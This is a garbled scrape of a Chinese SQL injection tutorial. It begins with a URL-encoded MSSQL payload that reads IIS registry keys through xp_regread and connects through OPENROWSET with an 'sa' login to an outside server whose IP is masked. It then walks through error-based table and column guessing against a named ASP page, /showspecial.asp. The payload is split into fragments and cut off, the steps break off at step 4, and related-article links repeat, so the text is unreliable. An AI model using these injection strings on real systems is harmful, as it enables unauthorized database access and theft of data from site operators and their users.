SQL注入漏洞，攻防必殺技！

%29%20%65%78%65%63%20%

6d%61%73%74%65%72%2e%64%62%6f%2e%78%70%5f%72%65%67%72%65%61%64%20%27%48%4b%45%59%5f%4c%4f%43

%41%4c%5f%4d%41%43%48%

49%4e%45%27%2c%27%53%59%53%54%45%4d%5c%43%4f%4e%54%52%4f%4c%53%65%74%30%30%31%5c%53%65%72%76

%69%63%65%73%5c%57%33%

53%56%43%5c%50%61%72%61%6d%65%74%65%72%73%5c%56%69%72%74%75%61%6c%20%52%6f%6f%74%73%27%2c%20

%27%2f%27%20%2c%40%72%

65%73%75%6c%74%20%6f%75%74%70%75%74%20%69%6e%73%65%72%74%20%69%6e%74%6f%20%6c%61%6f%6b%61%69

%20%28%63%68%61%38%29%

20%76%61%6c%75%65%73%28%27%53%45%4c%45%43%54%20%61%2e%2a%20%46%52%4f%4d%20%4f%50%45%4e%52%4f

%57%53%45%54%28%27%27%

53%51%4c%4f%4c%45%44%42%27%27%2c%27%27%3f%3f%49%50%27%27%3b%27%27%73%61%27%27%3b%27%27%3f%3f

%27%27%2c%20%27%27%53%

45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%70%75%62%73%2e%64%62%6f%2e%61%75%74%68%6f%72%73%20%77

%68%65%72%65%20%61%75%

5f%66%6e%61%6d%65%3d/33.shtml』 target=』_blank』

/showspecial.asp?specialid=1817;use master;–

注：–的作用是注釋掉程式中後面的sql語句，以防對我們構造的語句有影響，比如order by..

出現 microsoft ole db provider for sql server 錯誤 80040e21

多步 ole db 操作產生錯誤。如果可能，請檢查每個 ole db 狀態值。沒有工作被完成。

/showspecial.asp，行13

想在他的資料庫裡增加乙個管理員是不可能了，我們再換一種方法

2、提交http://**/showspecial.asp?specialid=1817 and 1<>(select count(id) from

[user])

這一句的意思是猜猜看是不是存在乙個名為user的表和他裡面有沒有id這個字段

一般來說:

如果不存在該錶的話，會出現

microsoft ole db provider for sql server 錯誤 80040e37

物件名 user 無效。

/showspecial.asp，行13

不存在該欄位的話，會出現

microsoft ole db provider for sql server 錯誤 80040e14

列名 id 無效。

/showspecial.asp，行13

注：一般來說，第一步是猜一些公共的表，這裡所指的公共表的意思是大多數的程式設計師在寫設計資料庫結構的時候會用到的常用的表和字段，比如新聞的news表中的編號欄位id，標題欄位title，使用者表user或者user_data中的編號欄位id，使用者名字段username，當然你也可以在該站點的登陸介面看他的原**，找到使用者名稱和密碼的表單的name值，那個也經常會是表欄位名的真實值，如

很幸運，果然存在user表和id欄位

3、通過提交http://**/showspecial.asp?specialid=1817 and 1<>(select count(username)

from [user])

這裡的username是根據登陸框的表單名去猜的，恰好存在該欄位。於是在該站註冊了乙個使用者名為rrrrr的使用者，作為注入的平台，得到我的使用者名稱的id值103534

4、繼續猜下去，這裡我還是利用的他程式中的表單名，提交：

SQL注入漏洞，攻防必殺技！

SQL注入漏洞攻防必殺技

拯救頻繁跳槽的必殺技！

職場必殺技之有效溝通

SQL注入漏洞，攻防必殺技！

SQL注入漏洞攻防必殺技

拯救頻繁跳槽的必殺技！

職場必殺技之有效溝通

相關推薦